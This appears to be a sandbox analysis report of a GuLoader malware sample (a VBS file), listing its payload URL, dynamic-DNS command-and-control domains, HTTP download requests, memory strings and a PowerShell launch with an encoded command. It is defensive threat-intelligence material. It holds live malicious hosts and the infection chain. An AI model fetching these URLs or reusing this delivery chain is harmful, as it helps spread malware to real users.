| Source | Detail |
|---|---|
| 00000009.00000000.4302405352.0000000000630000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"} |
| PO-19903.vbs | ReversingLabs: Detection: 19% |
| http://pesterbdd.com/images/Pester.png | Avira URL Cloud: Label: malware |
| unknown | HTTPS traffic detected: 148.66.138.165:443 -> 192.168.11.20:49738 version: TLS 1.2 |
| unknown | HTTPS traffic detected: 13.107.43.13:443 -> 192.168.11.20:49739 version: TLS 1.2 |
| | Binary string: $}l8C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.pdb source: powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp |
| | Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite |
| C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Dropped file: MILIEUFOR1.SaveToFile FileName, adSaveCreateOverWrite |
| Malware configuration extractor | URLs: https://vegproworld.com/wp-content/Touchb.vbs |
| unknown | DNS query: name: toshiba1122.ddns.net |
| unknown | DNS query: name: toshiba1122.duckdns.org |
| Joe Sandbox View | ASN Name: VCG-ASNG VCG-ASNG |
| Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
| Joe Sandbox View | IP Address: 13.107.43.13 13.107.43.13 |
| Joe Sandbox View | IP Address: 148.66.138.165 148.66.138.165 |
| global traffic | HTTP traffic detected: GET /wp-content/Touchb.vbs HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vegproworld.com Cache-Control: no-cache |
| global traffic | HTTP traffic detected: GET /download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304UDXKDuEA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: onedrive.live.com Cache-Control: no-cache Cookie: MUID=20718A960FA8687F03949A000BA86C7A |
| global traffic | TCP traffic: 192.168.11.20:49741 -> 194.5.98.59:3360 |
| global traffic | TCP traffic: 192.168.11.20:49742 -> 197.210.226.45:3360 |
| global traffic | TCP traffic: 192.168.11.20:49752 -> 197.210.226.89:3360 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49739 |
| unknown | Network traffic detected: HTTP traffic on port 443 -> 49738 |
| unknown | Network traffic detected: HTTP traffic on port 49738 -> 443 |
| unknown | Network traffic detected: HTTP traffic on port 49739 -> 443 |
| unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
| ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
| ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4413614771.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4414053518.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
| powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
| powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
| powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
| powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
| powershell.exe, 00000002.00000002.4962804666.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB |
| powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
| powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
| powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
| powershell.exe, 00000002.00000002.4964701496.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
| powershell.exe, 00000002.00000002.4973562589.00000000059A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
| ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jgdbpa.am.files.1drv.com/ |
| ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jgdbpa.am.files.1drv.com/y4maRwf2HHiC3pXkJNQF9GW7D5PTiYgoa5jSqqmo4o-s2nHza5cDyEK1j43pCU9Ua1Y |
| ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000003.4444820883.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8459529246.0000000002C3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jgdbpa.am.files.1drv.com/y4mstf71DnOKqqDiI505gr5x-9GCiHWv5DdrHG7ALTidojrV4lxxrd7sQ3eLTcarbaq |
| powershell.exe, 00000002.00000002.4975592880.0000000006188000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
| ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/ |
| ieinstal.exe, 00000009.00000002.8458973630.0000000002BD6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/: |
| ieinstal.exe, 00000009.00000002.8458100390.0000000002B94000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=7EB674A88CCF381D&resid=7EB674A88CCF381D%21126&authkey=AKOI304 |
| ieinstal.exe, 00000009.00000002.8458764109.0000000002BBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/ndows |
| ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vegproworld.com/:k |
| ieinstal.exe, 00000009.00000002.8457496133.0000000002B79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vegproworld.com/rj-$ |
| ieinstal.exe, 00000009.00000002.8457894075.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vegproworld.com/wp-content/Touchb.vbs |
| unknown | DNS traffic detected: queries for: vegproworld.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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 |